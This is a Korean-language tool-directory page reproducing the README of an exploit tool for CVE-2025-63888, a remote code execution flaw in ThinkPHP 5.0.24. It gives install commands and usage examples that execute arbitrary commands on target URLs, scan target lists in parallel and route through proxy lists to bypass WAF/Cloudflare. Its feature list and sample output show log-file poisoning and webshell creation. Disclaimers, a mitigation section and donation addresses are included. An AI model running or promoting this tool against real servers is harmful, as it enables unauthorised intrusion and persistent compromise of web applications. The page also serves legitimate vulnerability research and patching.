Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
cve-2025-63888-exploit — 보안 연구 도구로, CVE-2025-63888 (ThinkPHP 5.0.24 파일 포함 RCE 취약점)을 탐지하고 테스트합니다. | Kitploit
도구/GitHubGitHub/an5i/cve-2025-63888-exploit
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed TeamingPayload Development
GitHuban5i/cve-2025-63888-exploit

cve-2025-63888-exploit

보안 연구 도구로, CVE-2025-63888 (ThinkPHP 5.0.24 파일 포함 RCE 취약점)을 탐지하고 테스트합니다.

저장소 보기
10429개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-63888 ThinkPHP 5.0.24 파일 포함 RCE 익스플로잇

ThinkPHP 5.0.24의 CVE-2025-63888 취약점을 탐지하고 테스트하기 위한 보안 연구 도구로, 파일 포함 공격을 통해 원격 코드 실행을 가능하게 합니다.

⚠️ 면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 사용해야 합니다. 컴퓨터 시스템에 대한 무단 접근은 불법입니다. 이 도구는 소유하고 있거나 명시적인 서면 허가를 받은 시스템에서만 사용하십시오.

📋 개요

CVE-2025-63888은 ThinkPHP 5.0.24에서 발생하는 심각한 원격 코드 실행 취약점입니다. 이 취약점은 thinkphp/library/think/template/driver/File.php에 위치한 read 함수에 존재하며, 공격자가 view() 함수의 템플릿 경로를 조작하여 파일 포함 공격을 통해 임의 코드를 실행할 수 있게 합니다.

CVSS 점수: 9.8 (치명적)
영향받는 버전: ThinkPHP 5.0.24 (정확한 버전)
취약한 파일: thinkphp/library/think/template/driver/File.php
취약한 함수: read() 메서드

🔍 기능

  • 자동 ThinkPHP 탐지: ThinkPHP 설치 및 버전 식별
  • 취약점 테스트: CVE-2025-63888 파일 포함 취약점 테스트
  • 엔드포인트 발견: 취약한 엔드포인트 자동 탐색
  • 파일 포함 익스플로잇: 파일 포함 기능 시연
  • 로그 파일 포이즈닝: RCE를 위한 로그 파일 포이즈닝 시도
  • 웹쉘 생성: 파일 포함을 통한 웹쉘 생성
  • 명령 실행: (승인된 테스트용) 임의 명령 실행
  • 멀티스레딩 지원: 여러 대상 병렬 스캔
  • 프록시 지원: WAF/Cloudflare 우회
  • JSON 내보내기: JSON 형식의 상세 결과

📦 설치

사전 요구 사항

  • Python 3.6 이상
  • pip (Python 패키지 관리자)

빠른 설치

root@kitploit:~
# 저장소 클론
git clone https://github.com/AN5I/cve-2025-63888-exploit.git
cd cve-2025-63888-exploit

# 의존성 설치
pip install -r requirements.txt

# 스크립트 실행 권한 부여 (선택 사항)
chmod +x cve_2025_63888_exploit.py

대안: 직접 다운로드

root@kitploit:~
# 스크립트 다운로드
wget https://raw.githubusercontent.com/AN5I/cve-2025-63888-exploit/main/cve_2025_63888_exploit.py

# 의존성 설치
pip install requests

🚀 사용법

기본 사용법

root@kitploit:~
# 단일 대상
python3 cve_2025_63888_exploit.py -u http://target.com

# 사용자 정의 명령 실행
python3 cve_2025_63888_exploit.py -u http://target.com -c "whoami"

# 파일에서 여러 대상
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

# 더 빠른 스캔을 위한 스레딩 사용
python3 cve_2025_63888_exploit.py -u http://target.com -t 5

# 디버깅을 위한 상세 출력
python3 cve_2025_63888_exploit.py -u http://target.com -v

프록시 사용

root@kitploit:~
# 단일 프록시
python3 cve_2025_63888_exploit.py -u http://target.com --proxy http://proxy:port

# 파일에서 여러 프록시
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

명령줄 옵션

root@kitploit:~
-u, --url          대상 URL
-f, --file         대상 URL이 포함된 파일 (한 줄에 하나씩)
-c, --command      실행할 명령 (기본값: id)
-t, --threads      스레드 수 (기본값: 1)
-o, --output       출력 파일 (기본값: uknf_results.json)
-v, --verbose      상세 로깅 활성화
--proxy            프록시 URL (예: http://127.0.0.1:8080)
--proxy-list       프록시 URL이 포함된 파일 (한 줄에 하나씩)

📊 출력

스크립트는 상세 결과를 포함한 JSON 파일을 생성합니다:

root@kitploit:~
{
  "target": "http://target.com",
  "timestamp": "2025-11-20T15:05:35.763409",
  "vulnerable": true,
  "endpoint_found": true,
  "exploitation_successful": true,
  "command_executed": "id",
  "output": "uid=1000(user) gid=1000(user)...",
  "vulnerable_endpoint": "/index.php/index/index/view",
  "webshell_created": true,
  "webshell_path": "../../../runtime/log/2025/11/18.log"
}

🔬 작동 방식

  1. 탐지 단계: ThinkPHP 프레임워크 지표 스캔
  2. 버전 탐지: ThinkPHP 버전(5.0.24) 식별 시도
  3. 취약점 테스트: 파일 포함 취약점 테스트
  4. 엔드포인트 발견: view() 함수를 사용하는 취약한 엔드포인트 찾기
  5. 익스플로잇: 파일 포함을 통한 RCE 기능 시연

🛡️ 완화 방법

ThinkPHP 5.0.24를 사용 중인 경우:

  1. 즉시 업그레이드:

    • ThinkPHP 5.0.25 이상으로 업데이트
    • 또는 ThinkPHP 6.x/7.x로 업그레이드
  2. 경로 검증 구현:

    • view() 함수에 엄격한 경로 검증 추가
    • 디렉터리 트래버설 문자(../, ..) 차단
    • 템플릿 경로를 허용 목록 디렉터리로 제한
  3. 코드 수준 수정:

    • 처리 전 템플릿 경로 검증
    • realpath()를 사용하여 파일이 허용된 디렉터리 내에 있는지 확인
    • 함수 허용 목록 구현

📚 참고 자료

  • CVE: CVE-2025-63888
  • GitHub Gist: CVE-2025-63888 세부 정보
  • Yuque 문서: 상세 분석
  • ThinkPHP 매뉴얼: 공식 문서

📖 예제

예제 1: 단일 대상 스캔

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com

예제 2: 여러 대상과 출력 파일

root@kitploit:~
# 대상 파일 생성
echo "https://target1.com" > targets.txt
echo "https://target2.com" >> targets.txt

# 스캔 실행
python3 cve_2025_63888_exploit.py -f targets.txt -o results.json

예제 3: 사용자 정의 명령 실행

root@kitploit:~
python3 cve_2025_63888_exploit.py -u https://example.com -c "uname -a"

예제 4: 프록시 사용

root@kitploit:~
# 단일 프록시
python3 cve_2025_63888_exploit.py -u https://example.com --proxy http://127.0.0.1:8080

# 파일에서 여러 프록시
echo "http://proxy1:8080" > proxies.txt
echo "http://proxy2:8080" >> proxies.txt
python3 cve_2025_63888_exploit.py -f targets.txt --proxy-list proxies.txt

🤝 기여

기여는 환영합니다! Pull Request를 자유롭게 제출해 주세요.

  1. 저장소를 포크합니다.
  2. 기능 브랜치를 만듭니다 (git checkout -b feature/AmazingFeature).
  3. 변경 사항을 커밋합니다 (git commit -m 'Add some AmazingFeature').
  4. 브랜치에 푸시합니다 (git push origin feature/AmazingFeature).
  5. Pull Request를 엽니다.

🐛 이슈

문제가 발생하거나 제안 사항이 있으면 GitHub에 이슈를 열어 주세요.

📝 라이선스

이 프로젝트는 MIT 라이선스에 따라 라이선스가 부여됩니다. 자세한 내용은 LICENSE 파일을 참조하세요.

⭐ 스타 기록

이 도구가 유용하다고 생각하시면 GitHub에서 별표를 눌러 주세요!

⚖️ 법적 고지

이 도구는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다. 저자는 이 프로그램의 오용이나 손해에 대해 책임을 지지 않습니다. 사용자는 시스템을 테스트하기 전에 적절한 승인을 받았는지 확인해야 합니다.

🙏 감사의 말

  • 원본 취약점 보고자: Master-0-0
  • ThinkPHP 보안 커뮤니티
  • 취약점 분석에 기여한 보안 연구원들

💰 후원

이 도구가 유용하고 프로젝트를 지원하고 싶으시다면:

비트코인 (BTC):

root@kitploit:~
bc1qj95y35w8r2mw0u28zrm3dmxtzjkq258xdv8tzv

이더리움 (ETH):

root@kitploit:~
0x3DC302a3f35F6cD1A03FF4982EcE0dE8fE1cEba7

지원해 주셔서 감사합니다! 🙏

도구 다운로드